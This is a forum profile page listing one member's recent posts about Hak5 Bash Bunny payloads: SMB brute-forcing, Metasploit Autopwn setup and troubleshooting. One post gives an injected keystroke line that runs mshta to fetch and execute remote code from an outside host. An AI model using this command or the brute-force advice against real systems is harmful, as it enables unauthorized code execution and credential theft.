Jump to content

Mohamed A. Baset

Active Members
  • Content Count

    38
  • Joined

  • Last visited

  • Days Won

    2

1 Follower

About Mohamed A. Baset

  • Rank
    Hak5 Fan +

Recent Profile Visitors

727 profile views
  1. Modify the last injected payload from: QUACK STRING "mshta http://192.168.171.32:443/index" to QUACK STRING "mshta http://192.168.171.32:443/index;exit"
  2. @PoSHMagiC0de In fact it's not my python script but a good idea and can be implemented!
  3. What about the firewall? Because sometimes the port is locally opened but filtered by the firewall to be accessed from outside the local machine!
  4. + If you want more speed try this payload: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SMBruteBunny
  5. As indicated "mmcbrute" could not connect to host "172.16.64.10" on port "445". That's actually a weird error since the Target IP Address is being obtained automatically from BB's DHCP server Debug: Try to make sure: 1. That that target already got this IP address "172.16.64.10" from BB DHCP server's IP pool, if not, then there is something wrong! 2. The target has no firewall activated, if so, BB won't be able to reach port 445 to perform the brute-force attack!
  6. Here is another refined version: https://github.com/hak5/bashbunny-payloads/pull/383 Waiting for merging the PR. Cheers!
  7. You can watch the video i did, Unfortunately it takes like 3 minutes minimum and with "CUCUMBER PLAID" too, check here: https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
  8. @Darren Kitchen and @CatatonicPrime The problem is that Metasploit Framework takes forever to load on the humble specifications of BashBunny, I have done this like two years ago:
  9. YW Man, I'm so excited to dig on your scenario this weekend, the idea of deauthing, probing and beaconing to get all the clients connected to the tetra then attack them with the bunny seems very interesting!
  10. 1. Installed ruby via "rbenv" (2.4.1 armhf is preferred) 2. Cloned Rapid7's metasploit repo inside /tools/ 3. cd to /tools/metasploit-framework/ 4. gem install bundler 5. bundle install 7. Bingo!
  11. And finally i did the PR: https://github.com/hak5/bashbunny-payloads/pull/242 Waiting for approval!
  12. @Sebkinne @Darren Kitchen This must be configured in the next bunny update to add "postgres" user in the network user group usermod -a -G netdev,systemd-network,net_raw postgres What do you think?
  13. Glad to hear that, I suffered too to finally figure out the real problem. Now we have lots of attack possibilities, Share with me the good stuff you're thinking about tho :) I'm planning to release my Metasploit Autopwn bashbunny payload very soon.
  14. As i mentioned before this might be a 99% an issue with the user priveleges because "postgres" user is not added to the user groups where it can access network, Try: usermod -a -G netdev,systemd-network,net_raw postgres Then tell me if it works or not + the exact problem if exist!
  15. I don't know if you are familiar with other Hak5 products or not but LanTurtle would be more reliable in the attack scenario you are describing here!
×
×
  • Create New...